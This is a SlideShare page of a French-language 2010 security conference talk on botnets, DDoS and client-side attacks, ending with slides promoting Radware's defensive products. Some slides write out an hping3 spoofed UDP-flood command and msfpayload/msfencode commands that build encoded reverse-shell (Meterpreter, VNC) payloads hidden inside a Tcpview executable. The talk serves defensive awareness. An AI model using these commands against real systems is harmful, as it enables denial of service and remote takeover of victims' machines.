SlideShare ist ein Scribd-Unternehmen logo
1 von 27
Downloaden Sie, um offline zu lesen
Maîtriser l’art du
Kung-Fu
19 octobre 2010
Colloque québécois de la sécurité de l'information
(CQSI)
Michel Cusin, Architechte Sécurité Bell
Jocelyn Rainville, SE Radware
Slide 2
Agenda
• Maîtriser l’art du Kung-Fu ???
• Server-side Attacks “Attaques traditionnelles”
• Client-side Attacks “Nouvelle tendance”
• Démonstrations
• Conséquences
• Solutions
Slide 3
Kung-Fu
Slide 3
• Kung-Fu qui signifie art martial, vient de la nécessité de légitime
défense.
• Les termes "Kung" et "Fu" traduits littéralement et séparément ont une
signification différente:
• "Kung" désigne la "maîtrise", le "perfectionnement".
• "Fu" désigne les techniques en tant que contenu.
Comment se porte votre Kung-Fu en sécurité ?
• Kung-Fu en sécurité -> Maîtrise des techniques en sécurité.
Mais qu’est-ce que le Kung-Fu?
Slide 4
Samouraï vs Ninja
vs
Samouraï Ninja
Slide 5
Samouraï vs Ninja
Qu’ont-ils en communs?
Ils maîtrisent leur art…
• Ils maîtrisent leurs techniques.
• Ils maîtrisent leurs armes.
• Ils maîtrisent leurs spécialités.
• Ils défendent ce en quoi ils croient.
Slide 6
Professionnels de la sécurité vs Pirates
vs
(Samouraï) (Ninja)
Slide 7
Qu’avons-nous en communs?
• Maîtrise des techniques
• Utilisation des outils
• Connaissances
• Objectifs
Maîtrisons-nous notre art ?
Professionnels de la sécurité vs Pirates
Slide 8
Server-side Attacks
Server-side Attacks “Attaques traditionnelles”
Slide 9
Qu’est-ce qu’un Botnet
Bot
Bot
Bot
C&C
Bot
Pirate
Victime
Slide 10
Botnet à louer (IMDDOS)
• Botnet « commercial »
•10 000 nouvelles victime par jour
• Propagation (peer-to-peer)
• Windows 7 crack
• Autres noms attrayants
• Portail « libre-service »
• Support 7/24
• Made in China
Source: http://www.damballa.com/IMDDOS/
Slide 11
Les Botnets: Le Québec n’y échappe pas
Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire)
• Le bot de la St-Valentin (14 Février 2007)
• Le bot était transporté par un ver
• Réseau paralysé
• Au moins l’auteur s’est excusé…
Botnet: Opération Basique
• Février 2008
• Plus de 100 pays sont touchés, sur tous les continents.
• 17 arrestations (de 17 à 26 ans dont 3 mineurs)
• Débût de l’enquête: Été 2006
Source: http://www.sq.gouv.qc.ca/salle-de-presse/communiques/demantelement-reseau-pirates-informatiques-2008.jsp
Slide 12
Qu’est-ce qu’un DDoS
DDoS: Distributed Denial of Service
(Déni de service distribué)
Slide 13
Démonstration DDoS
Simulation d’un DDoS
(Avec une seule machine)
Hping3 –udp –flood –rand-source -p 80 [IP Serveur Web]
Defense Pro
Slide 14
L’envers de la médaille…
Slide 15
“Client-side attacks”
Client-side Attacks: La nouvelle tendance
Slide 16
Création d’un “Client-side attacks”
Metasploit Social Engineer Toolkit (SET)
Ultimate EXE Packer (UPX)
Slide 17
Metasploit
Le “framework” Metasploit est un outil pour le développement et
l'exécution d'exploits contre une machine distante.
VNCINJECT:
./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10
LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x
/home/Tcpview.exe -t exe > rev_vnc.exe
Meterpreter:
./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10
LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x
/home/Tcpview.exe -t exe > rev_vnc.exe
Slide 18
VirusTotal
Plus de 40 antivirus différents…
Slide 19
Camouflage du “malware”
Le Ninja maîtrise l’art du camoufflage…
Slide 20
Attention!
Slide 21
Posez-vous la question
~300
Vulnérabilités découvertes et documentés au cours des 3 dernières années:
~90
~200
Sources: http://nvd.nist.gov/ et http://osvdb.org/
Est-ce que votre stratégie de mise à jour inclue ces produits? Vraiment…?
Slide 22
Scénario d’un “client-side attack”
Connexion en sortie:
Port TCP 80 (HTTP)
ou 443 (HTTPS)
DefensePro
Serveur
Victime
Coupe-feuPirate
Environnement corporatif
VNCINJECT:
./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10
LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x
/home/Tcpview.exe -t exe > rev_vnc.exe
IPS: Protection par signatures statiques
• Procure une protection contre:
– Vers, Bots, Trojans, Hameçonage,
logiciels espions
– Web, courriel, SQL, VoIP (SIP),
vulnérabilités DNS
– Proxy anonymiseur, attaques IPv6
– Vulnérabilités Microsoft
– Anomalies de protocol
• Protection par signatures:
– Équipe de pointe de recherche en
sécurité
– Protection contre l’exploitation des
vulnérabilités connues
– Mise à jour hebdomadaire et
d’urgence des signatures
Slide 23
Protection DDoS : Signatures en temps réel
• Protection par signature créées automatiquement en temps réel contre
les attaques DDoS réseau:
– SYN floods;
– TCP floods;
– UDP/ICMP floods.
• Proposition de valeur
– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;
– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 24
Network Behavioral Analysis: Real-time Signatures Protection
• L’Analyse Comportementale Réseau (NBA - Network behavioral
analysis) détecte les transactions anormales au niveau des utilisateurs
ainsi que des applications.
• Protection par signatures automatiques en temps réel contre:
– Propagation de logiciel malveillant “Zéro-minute”
– Mauvaise utilisation des ressources d’applications comme:
• Attaques de type “Brute force”
• Balayages d’application Web
• Inondations (floods) de page HTTP
• Balayages SIP
• Inondations (flood) SIP
• Proposition de valeur
– Maintiens de la disponibilité des applications critiques, même durant les
attaques;
– Blocage des attaques sans bloquer le trafic des utilisateurs légitimes;
– Protection automatique en temps réel contre les inondations réseau (floods)
sans nécessiter d'intervention humaine.
Slide 25
Slide 26
Une question d’équilibre
Conclusion
C’est une question d’équilibre
ConnaissancesTechnologies
Slide 27
Questions?
La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca
Questions?
Coupon pour le tirage d’une formation SANS gratuite en français:
Détection de pirates informatiques pour administrateurs de systèmes
Info sur http://www.sans.org et sur http://cusin.ca

Weitere ähnliche Inhalte

Andere mochten auch

Les bots : introduction
Les bots : introductionLes bots : introduction
Les bots : introductionGilles Favre
 
Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...
Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...
Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...DidBERNARD
 
Historia de Nastagio degli Onesti
Historia de Nastagio degli OnestiHistoria de Nastagio degli Onesti
Historia de Nastagio degli OnestiCristina Verdoy
 
58586406 ccna4-resume-19-pages
58586406 ccna4-resume-19-pages58586406 ccna4-resume-19-pages
58586406 ccna4-resume-19-pagesilbahi
 
Tema 2 segunda_parte_genero
Tema 2 segunda_parte_generoTema 2 segunda_parte_genero
Tema 2 segunda_parte_generoMarta Jaén
 
Berthenay, les prairies du « Bout du monde »
Berthenay, les prairies du « Bout du monde »Berthenay, les prairies du « Bout du monde »
Berthenay, les prairies du « Bout du monde »Mission Val de Loire
 
CMSday 2013 - Capter un public international
CMSday 2013 - Capter un public internationalCMSday 2013 - Capter un public international
CMSday 2013 - Capter un public internationalSmile I.T is open
 
19 et 20 dossier marco_basaiti_lafille
19 et 20 dossier marco_basaiti_lafille19 et 20 dossier marco_basaiti_lafille
19 et 20 dossier marco_basaiti_lafilleseminaire_venitien
 
Proyecto TIC en un centro educativo
Proyecto TIC en un centro educativoProyecto TIC en un centro educativo
Proyecto TIC en un centro educativoDiegovl1968
 
/Home/usuario/desktop/china
/Home/usuario/desktop/china/Home/usuario/desktop/china
/Home/usuario/desktop/chinajesusblanc
 
Complément medef contreparties
Complément medef contrepartiesComplément medef contreparties
Complément medef contrepartiesbusiboost
 
Pl 0398 2013 ley de empresas públicas inicial
Pl 0398 2013 ley de empresas públicas inicialPl 0398 2013 ley de empresas públicas inicial
Pl 0398 2013 ley de empresas públicas inicialAlejandra Prado
 
HotelsCombined - Présentation générale
HotelsCombined - Présentation généraleHotelsCombined - Présentation générale
HotelsCombined - Présentation généralemhuynh
 
C:\fakepath\conv paul b
C:\fakepath\conv paul bC:\fakepath\conv paul b
C:\fakepath\conv paul bschool
 

Andere mochten auch (20)

Les bots : introduction
Les bots : introductionLes bots : introduction
Les bots : introduction
 
Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...
Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...
Job le patriarche, ou guide de survie pour l'entrepreneur en periode de crise...
 
Sfsic14 140604-proulx
Sfsic14 140604-proulxSfsic14 140604-proulx
Sfsic14 140604-proulx
 
Historia de Nastagio degli Onesti
Historia de Nastagio degli OnestiHistoria de Nastagio degli Onesti
Historia de Nastagio degli Onesti
 
58586406 ccna4-resume-19-pages
58586406 ccna4-resume-19-pages58586406 ccna4-resume-19-pages
58586406 ccna4-resume-19-pages
 
Tema 2 segunda_parte_genero
Tema 2 segunda_parte_generoTema 2 segunda_parte_genero
Tema 2 segunda_parte_genero
 
Berthenay, les prairies du « Bout du monde »
Berthenay, les prairies du « Bout du monde »Berthenay, les prairies du « Bout du monde »
Berthenay, les prairies du « Bout du monde »
 
CMSday 2013 - Capter un public international
CMSday 2013 - Capter un public internationalCMSday 2013 - Capter un public international
CMSday 2013 - Capter un public international
 
Proceso de descolonización
Proceso de descolonizaciónProceso de descolonización
Proceso de descolonización
 
19 et 20 dossier marco_basaiti_lafille
19 et 20 dossier marco_basaiti_lafille19 et 20 dossier marco_basaiti_lafille
19 et 20 dossier marco_basaiti_lafille
 
Paris
ParisParis
Paris
 
Proyecto TIC en un centro educativo
Proyecto TIC en un centro educativoProyecto TIC en un centro educativo
Proyecto TIC en un centro educativo
 
/Home/usuario/desktop/china
/Home/usuario/desktop/china/Home/usuario/desktop/china
/Home/usuario/desktop/china
 
Complément medef contreparties
Complément medef contrepartiesComplément medef contreparties
Complément medef contreparties
 
Yo conozco mi herencia
Yo conozco mi herenciaYo conozco mi herencia
Yo conozco mi herencia
 
Pl 0398 2013 ley de empresas públicas inicial
Pl 0398 2013 ley de empresas públicas inicialPl 0398 2013 ley de empresas públicas inicial
Pl 0398 2013 ley de empresas públicas inicial
 
HotelsCombined - Présentation générale
HotelsCombined - Présentation généraleHotelsCombined - Présentation générale
HotelsCombined - Présentation générale
 
C:\fakepath\conv paul b
C:\fakepath\conv paul bC:\fakepath\conv paul b
C:\fakepath\conv paul b
 
ciudad sostenible
ciudad sostenible ciudad sostenible
ciudad sostenible
 
Uriarte 2419 - Brochure
Uriarte 2419 - BrochureUriarte 2419 - Brochure
Uriarte 2419 - Brochure
 

Ähnlich wie Maitriser l'art du kung fu cqsi2010

Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pasSécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pasMaxime ALAY-EDDINE
 
Competitic sécurite informatique - numerique en entreprise
Competitic   sécurite informatique - numerique en entrepriseCompetitic   sécurite informatique - numerique en entreprise
Competitic sécurite informatique - numerique en entrepriseCOMPETITIC
 
Enjeux et évolutions de la sécurite informatique
Enjeux et évolutions de la sécurite informatiqueEnjeux et évolutions de la sécurite informatique
Enjeux et évolutions de la sécurite informatiqueMaxime ALAY-EDDINE
 
Ia et cybersecurite - conférence 3IL
Ia et cybersecurite - conférence 3ILIa et cybersecurite - conférence 3IL
Ia et cybersecurite - conférence 3ILOPcyberland
 
Enjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale NantesEnjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale NantesMaxime ALAY-EDDINE
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseAntonio Fontes
 
Travailler TOUS ensemble lors d’une cybercrise!
Travailler TOUS ensemble lors d’une cybercrise!Travailler TOUS ensemble lors d’une cybercrise!
Travailler TOUS ensemble lors d’une cybercrise!ColloqueRISQ
 
Sécurité informatique - Etat des menaces
Sécurité informatique - Etat des menacesSécurité informatique - Etat des menaces
Sécurité informatique - Etat des menacesMaxime ALAY-EDDINE
 
Gestion d'incidents pour développeurs
Gestion d'incidents pour développeursGestion d'incidents pour développeurs
Gestion d'incidents pour développeursHarvey Francois
 
Attaques DDoS par Bruno Tréguier
Attaques DDoS par Bruno TréguierAttaques DDoS par Bruno Tréguier
Attaques DDoS par Bruno TréguierAFEIT
 
Panorama des menaces informatiques - Philippe Humeau, Net4All
Panorama des menaces informatiques - Philippe Humeau, Net4AllPanorama des menaces informatiques - Philippe Humeau, Net4All
Panorama des menaces informatiques - Philippe Humeau, Net4AllNet4All
 
La sécurité sur le web
La sécurité sur le webLa sécurité sur le web
La sécurité sur le webSofteam agency
 
SEGURET_presentation_secur_Lyon_seguret.pdf
SEGURET_presentation_secur_Lyon_seguret.pdfSEGURET_presentation_secur_Lyon_seguret.pdf
SEGURET_presentation_secur_Lyon_seguret.pdfAssociationAF
 
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdfCopy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdfsimogamer3
 
Gestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoTGestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoTMaxime ALAY-EDDINE
 
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...Microsoft
 
Deep Dive WinJS – Profitez à 100% de son potentiel
Deep Dive WinJS – Profitez à 100% de son potentielDeep Dive WinJS – Profitez à 100% de son potentiel
Deep Dive WinJS – Profitez à 100% de son potentielMicrosoft
 

Ähnlich wie Maitriser l'art du kung fu cqsi2010 (20)

Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pasSécurité informatique : le Retour sur Investissement que vous n'attendiez pas
Sécurité informatique : le Retour sur Investissement que vous n'attendiez pas
 
Hackfest @ WAQ2011
Hackfest @ WAQ2011Hackfest @ WAQ2011
Hackfest @ WAQ2011
 
Competitic sécurite informatique - numerique en entreprise
Competitic   sécurite informatique - numerique en entrepriseCompetitic   sécurite informatique - numerique en entreprise
Competitic sécurite informatique - numerique en entreprise
 
Snort
SnortSnort
Snort
 
Enjeux et évolutions de la sécurite informatique
Enjeux et évolutions de la sécurite informatiqueEnjeux et évolutions de la sécurite informatique
Enjeux et évolutions de la sécurite informatique
 
Ia et cybersecurite - conférence 3IL
Ia et cybersecurite - conférence 3ILIa et cybersecurite - conférence 3IL
Ia et cybersecurite - conférence 3IL
 
Enjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale NantesEnjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
Enjeux et évolutions de la sécurité informatique - Présentation Centrale Nantes
 
Sécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défenseSécurité des applications web: attaque et défense
Sécurité des applications web: attaque et défense
 
Travailler TOUS ensemble lors d’une cybercrise!
Travailler TOUS ensemble lors d’une cybercrise!Travailler TOUS ensemble lors d’une cybercrise!
Travailler TOUS ensemble lors d’une cybercrise!
 
Sécurité informatique - Etat des menaces
Sécurité informatique - Etat des menacesSécurité informatique - Etat des menaces
Sécurité informatique - Etat des menaces
 
Gestion d'incidents pour développeurs
Gestion d'incidents pour développeursGestion d'incidents pour développeurs
Gestion d'incidents pour développeurs
 
Attaques DDoS par Bruno Tréguier
Attaques DDoS par Bruno TréguierAttaques DDoS par Bruno Tréguier
Attaques DDoS par Bruno Tréguier
 
Panorama des menaces informatiques - Philippe Humeau, Net4All
Panorama des menaces informatiques - Philippe Humeau, Net4AllPanorama des menaces informatiques - Philippe Humeau, Net4All
Panorama des menaces informatiques - Philippe Humeau, Net4All
 
La sécurité sur le web
La sécurité sur le webLa sécurité sur le web
La sécurité sur le web
 
SEGURET_presentation_secur_Lyon_seguret.pdf
SEGURET_presentation_secur_Lyon_seguret.pdfSEGURET_presentation_secur_Lyon_seguret.pdf
SEGURET_presentation_secur_Lyon_seguret.pdf
 
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdfCopy of PARTIE-1 Introduction à la cyber sécurité.pdf
Copy of PARTIE-1 Introduction à la cyber sécurité.pdf
 
Sécurité des données
Sécurité des donnéesSécurité des données
Sécurité des données
 
Gestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoTGestion des vulnérabilités dans l'IoT
Gestion des vulnérabilités dans l'IoT
 
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
Traitement d’incidents de sécurité : cas pratiques, retours d’expérience et r...
 
Deep Dive WinJS – Profitez à 100% de son potentiel
Deep Dive WinJS – Profitez à 100% de son potentielDeep Dive WinJS – Profitez à 100% de son potentiel
Deep Dive WinJS – Profitez à 100% de son potentiel
 

Mehr von michelcusin

Combler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationCombler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationmichelcusin
 
Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.michelcusin
 
Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12michelcusin
 
Article_pentest_Secus 10 12
Article_pentest_Secus 10 12Article_pentest_Secus 10 12
Article_pentest_Secus 10 12michelcusin
 
Social Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humainSocial Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humainmichelcusin
 
Intrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatiqueIntrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatiquemichelcusin
 
Vos enfants, Internet et vous
Vos enfants, Internet et vousVos enfants, Internet et vous
Vos enfants, Internet et vousmichelcusin
 
Pwn plug: Arme fatale
Pwn plug: Arme fatalePwn plug: Arme fatale
Pwn plug: Arme fatalemichelcusin
 
Article secus 05_11_pwnplug
Article secus 05_11_pwnplugArticle secus 05_11_pwnplug
Article secus 05_11_pwnplugmichelcusin
 
Article mc secus_10_10
Article mc secus_10_10Article mc secus_10_10
Article mc secus_10_10michelcusin
 
Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008michelcusin
 
Présentation botnet u_laval
Présentation botnet u_lavalPrésentation botnet u_laval
Présentation botnet u_lavalmichelcusin
 
Colloque cyber 2010 les botnets
Colloque cyber 2010   les botnetsColloque cyber 2010   les botnets
Colloque cyber 2010 les botnetsmichelcusin
 
Article secus 09_09
Article secus 09_09Article secus 09_09
Article secus 09_09michelcusin
 
Article mc secus_05_10
Article mc secus_05_10Article mc secus_05_10
Article mc secus_05_10michelcusin
 
Thank you for collaborating with your local hackers
Thank you for collaborating with your local hackersThank you for collaborating with your local hackers
Thank you for collaborating with your local hackersmichelcusin
 
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...michelcusin
 

Mehr von michelcusin (17)

Combler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'informationCombler les écarts en sécurité de l'information
Combler les écarts en sécurité de l'information
 
Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.Sécurité de l’information: L’importance du réveil des organisations.
Sécurité de l’information: L’importance du réveil des organisations.
 
Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12Article prot vs_def_secus_10_12
Article prot vs_def_secus_10_12
 
Article_pentest_Secus 10 12
Article_pentest_Secus 10 12Article_pentest_Secus 10 12
Article_pentest_Secus 10 12
 
Social Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humainSocial Engineer Toolkit: quand la machine attaque l’humain
Social Engineer Toolkit: quand la machine attaque l’humain
 
Intrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatiqueIntrusions et gestion d’incidents informatique
Intrusions et gestion d’incidents informatique
 
Vos enfants, Internet et vous
Vos enfants, Internet et vousVos enfants, Internet et vous
Vos enfants, Internet et vous
 
Pwn plug: Arme fatale
Pwn plug: Arme fatalePwn plug: Arme fatale
Pwn plug: Arme fatale
 
Article secus 05_11_pwnplug
Article secus 05_11_pwnplugArticle secus 05_11_pwnplug
Article secus 05_11_pwnplug
 
Article mc secus_10_10
Article mc secus_10_10Article mc secus_10_10
Article mc secus_10_10
 
Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008Présentation menaces web2.0_cqsi_2008
Présentation menaces web2.0_cqsi_2008
 
Présentation botnet u_laval
Présentation botnet u_lavalPrésentation botnet u_laval
Présentation botnet u_laval
 
Colloque cyber 2010 les botnets
Colloque cyber 2010   les botnetsColloque cyber 2010   les botnets
Colloque cyber 2010 les botnets
 
Article secus 09_09
Article secus 09_09Article secus 09_09
Article secus 09_09
 
Article mc secus_05_10
Article mc secus_05_10Article mc secus_05_10
Article mc secus_05_10
 
Thank you for collaborating with your local hackers
Thank you for collaborating with your local hackersThank you for collaborating with your local hackers
Thank you for collaborating with your local hackers
 
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
Comment les administrateurs de systèmes peuvent ils détecter les pirates info...
 

Maitriser l'art du kung fu cqsi2010

  • 1. Maîtriser l’art du Kung-Fu 19 octobre 2010 Colloque québécois de la sécurité de l'information (CQSI) Michel Cusin, Architechte Sécurité Bell Jocelyn Rainville, SE Radware
  • 2. Slide 2 Agenda • Maîtriser l’art du Kung-Fu ??? • Server-side Attacks “Attaques traditionnelles” • Client-side Attacks “Nouvelle tendance” • Démonstrations • Conséquences • Solutions
  • 3. Slide 3 Kung-Fu Slide 3 • Kung-Fu qui signifie art martial, vient de la nécessité de légitime défense. • Les termes "Kung" et "Fu" traduits littéralement et séparément ont une signification différente: • "Kung" désigne la "maîtrise", le "perfectionnement". • "Fu" désigne les techniques en tant que contenu. Comment se porte votre Kung-Fu en sécurité ? • Kung-Fu en sécurité -> Maîtrise des techniques en sécurité. Mais qu’est-ce que le Kung-Fu?
  • 4. Slide 4 Samouraï vs Ninja vs Samouraï Ninja
  • 5. Slide 5 Samouraï vs Ninja Qu’ont-ils en communs? Ils maîtrisent leur art… • Ils maîtrisent leurs techniques. • Ils maîtrisent leurs armes. • Ils maîtrisent leurs spécialités. • Ils défendent ce en quoi ils croient.
  • 6. Slide 6 Professionnels de la sécurité vs Pirates vs (Samouraï) (Ninja)
  • 7. Slide 7 Qu’avons-nous en communs? • Maîtrise des techniques • Utilisation des outils • Connaissances • Objectifs Maîtrisons-nous notre art ? Professionnels de la sécurité vs Pirates
  • 8. Slide 8 Server-side Attacks Server-side Attacks “Attaques traditionnelles”
  • 9. Slide 9 Qu’est-ce qu’un Botnet Bot Bot Bot C&C Bot Pirate Victime
  • 10. Slide 10 Botnet à louer (IMDDOS) • Botnet « commercial » •10 000 nouvelles victime par jour • Propagation (peer-to-peer) • Windows 7 crack • Autres noms attrayants • Portail « libre-service » • Support 7/24 • Made in China Source: http://www.damballa.com/IMDDOS/
  • 11. Slide 11 Les Botnets: Le Québec n’y échappe pas Botnet: RTSS (Réseau de Télécommunication Sociaux Sanitaire) • Le bot de la St-Valentin (14 Février 2007) • Le bot était transporté par un ver • Réseau paralysé • Au moins l’auteur s’est excusé… Botnet: Opération Basique • Février 2008 • Plus de 100 pays sont touchés, sur tous les continents. • 17 arrestations (de 17 à 26 ans dont 3 mineurs) • Débût de l’enquête: Été 2006 Source: http://www.sq.gouv.qc.ca/salle-de-presse/communiques/demantelement-reseau-pirates-informatiques-2008.jsp
  • 12. Slide 12 Qu’est-ce qu’un DDoS DDoS: Distributed Denial of Service (Déni de service distribué)
  • 13. Slide 13 Démonstration DDoS Simulation d’un DDoS (Avec une seule machine) Hping3 –udp –flood –rand-source -p 80 [IP Serveur Web] Defense Pro
  • 14. Slide 14 L’envers de la médaille…
  • 15. Slide 15 “Client-side attacks” Client-side Attacks: La nouvelle tendance
  • 16. Slide 16 Création d’un “Client-side attacks” Metasploit Social Engineer Toolkit (SET) Ultimate EXE Packer (UPX)
  • 17. Slide 17 Metasploit Le “framework” Metasploit est un outil pour le développement et l'exécution d'exploits contre une machine distante. VNCINJECT: ./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe Meterpreter: ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
  • 18. Slide 18 VirusTotal Plus de 40 antivirus différents…
  • 19. Slide 19 Camouflage du “malware” Le Ninja maîtrise l’art du camoufflage…
  • 21. Slide 21 Posez-vous la question ~300 Vulnérabilités découvertes et documentés au cours des 3 dernières années: ~90 ~200 Sources: http://nvd.nist.gov/ et http://osvdb.org/ Est-ce que votre stratégie de mise à jour inclue ces produits? Vraiment…?
  • 22. Slide 22 Scénario d’un “client-side attack” Connexion en sortie: Port TCP 80 (HTTP) ou 443 (HTTPS) DefensePro Serveur Victime Coupe-feuPirate Environnement corporatif VNCINJECT: ./msfpayload windows/vncinject/reverse_tcp LHOST=10.0.0.10 LPORT=443 R | ./msfencode -c 5 -e x86/shikata_ga_nai -x /home/Tcpview.exe -t exe > rev_vnc.exe
  • 23. IPS: Protection par signatures statiques • Procure une protection contre: – Vers, Bots, Trojans, Hameçonage, logiciels espions – Web, courriel, SQL, VoIP (SIP), vulnérabilités DNS – Proxy anonymiseur, attaques IPv6 – Vulnérabilités Microsoft – Anomalies de protocol • Protection par signatures: – Équipe de pointe de recherche en sécurité – Protection contre l’exploitation des vulnérabilités connues – Mise à jour hebdomadaire et d’urgence des signatures Slide 23
  • 24. Protection DDoS : Signatures en temps réel • Protection par signature créées automatiquement en temps réel contre les attaques DDoS réseau: – SYN floods; – TCP floods; – UDP/ICMP floods. • Proposition de valeur – Maintiens de la disponibilité des applications critiques, même durant les attaques; – Blocage des attaques sans bloquer le trafic des utilisateurs légitimes; – Protection automatique en temps réel contre les inondations réseau (floods) sans nécessiter d'intervention humaine. Slide 24
  • 25. Network Behavioral Analysis: Real-time Signatures Protection • L’Analyse Comportementale Réseau (NBA - Network behavioral analysis) détecte les transactions anormales au niveau des utilisateurs ainsi que des applications. • Protection par signatures automatiques en temps réel contre: – Propagation de logiciel malveillant “Zéro-minute” – Mauvaise utilisation des ressources d’applications comme: • Attaques de type “Brute force” • Balayages d’application Web • Inondations (floods) de page HTTP • Balayages SIP • Inondations (flood) SIP • Proposition de valeur – Maintiens de la disponibilité des applications critiques, même durant les attaques; – Blocage des attaques sans bloquer le trafic des utilisateurs légitimes; – Protection automatique en temps réel contre les inondations réseau (floods) sans nécessiter d'intervention humaine. Slide 25
  • 26. Slide 26 Une question d’équilibre Conclusion C’est une question d’équilibre ConnaissancesTechnologies
  • 27. Slide 27 Questions? La présentation sera disponible sur le site du CQSI ainsi que sur http://cusin.ca Questions? Coupon pour le tirage d’une formation SANS gratuite en français: Détection de pirates informatiques pour administrateurs de systèmes Info sur http://www.sans.org et sur http://cusin.ca